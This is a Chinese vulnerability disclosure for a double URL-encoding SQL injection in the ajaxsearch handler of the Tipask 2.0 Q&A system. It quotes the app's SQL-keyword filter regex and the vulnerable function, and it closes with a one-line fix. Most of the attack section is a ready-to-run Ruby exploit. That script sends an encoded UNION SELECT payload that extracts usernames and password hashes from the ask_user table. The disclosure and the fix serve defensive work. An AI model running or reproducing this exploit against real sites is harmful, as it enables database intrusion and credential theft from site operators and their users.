tipask问答系统2.0 ajaxsearch二次编码注入及修复 -

Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念，采用MVC构架，系统具有速度快，SEO友好，界面操作简洁明快等特点。

但是Tipask中存在二次编码问题，所以导致绕过系统过滤造成注入。

 

在程序入口/model/tipask.class.php init_request()中：

 

 

$this->get = taddslashes($this-> get, 1); $this-> post = taddslashes(array_merge($_GET, $_POST)); checkattack($this-> post, 'post' ); checkattack($this-> get, 'get' );

 

 

对get和post的参数进行了的addslashes，经过了checkattack检查：

 

 

function checkattack($reqarr, $reqtype= 'post') { $filtertable = array( 'get' => '\'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)' , 'post' => '\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)' , 'cookie' => '\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)' ); foreach ($reqarr as $reqkey => $reqvalue) { if (preg_match("/" . $filtertable[$reqtype] . "/is", $reqvalue) == 1) { print('Illegal operation!' ); exit(-1); } } }

 

 

 

 

这个检查主要针对SQL注入，发现匹配的规则就退出

 

现在看 漏洞 处/control/question.php onajaxsearch函数：

 

 

/* 提问自动搜索已经解决的问题 */ function onajaxsearch () { $title = urldecode($this-> get[2]); $questionlist = $_ENV[ 'question']->search_title($title, 2, 1, 0, 5); include template('ajaxsearch' ); }

 

 

对get的第二个参数urldecode后直接传入SQL语句，绕过了前面的过滤和检查，导致SQL注入。 

 

require "net/http" require "uri" def urlencode(exp) str = ""; exp.each_char { |c| str << sprintf("%%%x", c.ord) } return str end def request(method, url) if method.eql?("get") uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) response = http.request(Net::HTTP::Get.new(uri.request_uri)) return response end end doc =<<HERE ------------------------------------------------------- Tipask 2.0 Inejction Exploit Author:ztz Blog:http://ztz.fuzzexp.org/ ------------------------------------------------------- HERE usage =<<HERE Usage: ruby #{$0} host port path example: ruby #{$0} help.tipask测试数据 80 / HERE puts doc if ARGV.length < 3 puts usage else $host = ARGV[0] $port = ARGV[1] $path = ARGV[2] puts "[*]send request..." url = "http://#{$host}:#{$port}#{$path}?question/ajaxsearch/" exp = urlencode("' UNION SELECT 1,2,3,4,5,6,7,8,concat(username,char(0x3d),password),10,11,12,13,14,15,16,17,18,19,20,21 from ask_user#") response = request("get", url<<exp) result = response.body.scan(/\w+=\w{32}/) puts result end

 

 

修复方案：

function onajaxsearch () { $title = $this-> get[2]; $questionlist = $_ENV[ 'question']->search_title($title, 2, 1, 0, 5); include template('ajaxsearch' ); }

 

查看更多关于tipask问答系统2.0 ajaxsearch二次编码注入及修复 -的详细内容...